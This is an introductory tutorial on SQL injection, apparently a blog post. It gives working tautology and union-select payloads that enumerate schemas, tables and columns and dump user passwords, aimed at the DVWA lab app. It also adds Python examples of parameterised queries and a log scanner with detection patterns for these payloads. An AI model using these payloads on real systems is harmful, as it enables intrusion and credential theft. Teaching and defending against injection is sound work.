SQL Injection Simplified
Bond: “My dear, uncooperative Domino.”
Domino: “How do you know that? How do you know my friends call me Domino?”
Bond: “It’s on the bracelet on your ankle.”
Domino: “So, what sharp little eyes you’ve got.”
Bond: “Wait ’till you get to my teeth.”
Over the last decade of IT security, many articles on SQL injection have been written. I am simply making an effort to present it in a simpler and more reader-friendly way.
This article is devoted entirely to those who are new to SQL injection.
SQL
SQL is simply a language for interacting with your database to work on your data: you can store new data, or retrieve and modify data that is already stored.
SQL Injection:
SQL injection is a technique in which input supplied by the end user is passed directly into a query run against the application database.
What should we look at:
We should look at pages that take a direct parameter, like
http://example.com/search?id=2
(the query behind this link should look something like: select name from users where id= '2')
We can also identify the input field directly from the web page, for example:
<form method="GET" action="#">
<input type="text" name="id">
<input type="submit" name="Submit">
</form>
How to start testing:
To test whether SQL injection is possible, we can add ' or '1'='1 or ' or 'a'='a to the parameter (for more, refer to the list).
When you add this to the URL, it will look like
http://example.com/search?id=2'or '1' = '1 #
(the query behind this link should look something like: select name from users where id= '2' or '1' ='1' #')
-- tells MS SQL to ignore the rest of the query.
# tells MySQL to ignore the rest of the query, so only the part before it is executed.
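The following is an added example (not code from the original article) that shows, in Python with an in-memory SQLite table, why the tautology above changes the query, and why binding the value as a parameter stops it. The table, its rows, and the function names are constructed for this illustration; the comment style used in the union payload is -- rather than #, and sqlite_version() stands in for MySQL's @@version, because that is what SQLite understands.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the article's 'users' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer primary key, name text)")
    conn.executemany(
        "insert into users (id, name) values (?, ?)",
        [(1, "alice"), (2, "bob"), (3, "carol")],
    )
    return conn


def search_vulnerable(conn, user_id):
    """Builds the query by string concatenation, the shape shown in the
    article: a quote inside user_id closes the literal and everything
    after it is parsed as SQL."""
    query = "select name from users where id = '" + user_id + "'"
    return [row[0] for row in conn.execute(query)]


def search_safe(conn, user_id):
    """Binds the value as a parameter: the driver never splices it into
    the SQL text, so a quote in it is just part of the data."""
    query = "select name from users where id = ?"
    return [row[0] for row in conn.execute(query, (user_id,))]


if __name__ == "__main__":
    conn = make_db()
    print(search_vulnerable(conn, "2"))                              # ['bob']
    print(search_vulnerable(conn, "2' or '1'='1"))                   # all three names
    print(search_vulnerable(conn, "' union select sqlite_version() --"))  # the DB version
    print(search_safe(conn, "2' or '1'='1"))                         # []
```

Running it shows the difference a defender cares about: the concatenated query returns every row for the tautology and the engine version for the union payload, while the parameterised query returns nothing for either, because the whole string is compared against the id column as data.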
How to start:
Let's start with a search box. Pass 1' or '1'='1 # to the input field and watch the output.
As we can see, we get a search result, and our query has also been executed.
Now we should go further to test for the SQL injection vulnerability. We should check the DB version and DB name to confirm it, with the following queries:
'union select null, @@version #
'union select null, database() #
After confirming the SQL injection vulnerability, we can access the schema of the system using the following command:
'union select null, schema_name from information_schema.schemata #
The schema name is always the same as the name of the database that contains a table. We can access the tables directly from the schema using the following query.
'union select null, table_name from information_schema.tables where table_schema= 'dvwa' #
Now we only need the column names to access the data, so we query the table with the following:
'union select null, column_name from information_schema.columns where table_name = "users" #
Since we have the column names, we can access any data from the database like this:
'union select null, concat(first_name, 0x0a,user_id, 0x0a, password) from users #
You can do this on DVWA 1.8 with the low security setting.
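The enumeration steps above leave a recognisable trail in web server logs. As an added example (not part of the original article), here is a small Python scanner that URL-decodes the query parameters of access-log lines and flags the three shapes this article walks through: the quote-or-quote tautology, union select, and probes of information_schema, @@version or database(). The log lines and the signature names are constructed for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines in common log format; not real traffic.
# Lines 1-3 carry the article's payloads, URL-encoded as a browser would send them.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search?id=2 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /search?id=2%27or+%271%27+%3D+%271+%23 HTTP/1.1" 200 4096',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /search?id=%27union+select+null%2C+%40%40version+%23 HTTP/1.1" 200 700',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /search?id=%27union+select+null%2C+table_name+from+information_schema.tables+where+table_schema%3D+%27dvwa%27+%23 HTTP/1.1" 200 900',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /search?id=union+station HTTP/1.1" 200 300',
]

# Signature names are our own labels for the three payload shapes in the article.
SIGNATURES = {
    "tautology": re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.I),
    "union_select": re.compile(r"\bunion\b\s+select\b", re.I),
    "schema_probe": re.compile(r"information_schema\.|@@version|\bdatabase\(\)", re.I),
}

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def decoded_params(line):
    """Extract the request target and return its query parameters, decoded
    (parse_qsl turns + into space and unquotes %xx escapes)."""
    match = REQUEST_RE.search(line)
    if not match:
        return {}
    query = urlsplit(match.group(1)).query
    return dict(parse_qsl(query, keep_blank_values=True))


def classify(line):
    """Return the sorted list of signature names that match any decoded
    parameter value of the request; an empty list means nothing matched."""
    hits = set()
    for value in decoded_params(line).values():
        for name, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.add(name)
    return sorted(hits)


def scan(lines):
    """Return (line index, matched signatures) for every flagged line."""
    flagged = []
    for index, line in enumerate(lines):
        hits = classify(line)
        if hits:
            flagged.append((index, hits))
    return flagged


if __name__ == "__main__":
    for index, hits in scan(LOG_LINES):
        print(index, hits)
```

Matching on decoded parameter values rather than the raw request line matters: the quote and the # in the payloads arrive as %27 and %23, so a pattern applied to the undecoded line would miss them. The last log line, a plain search for "union station", is there to show that the union signature requires the word select to follow, which keeps ordinary input from being flagged.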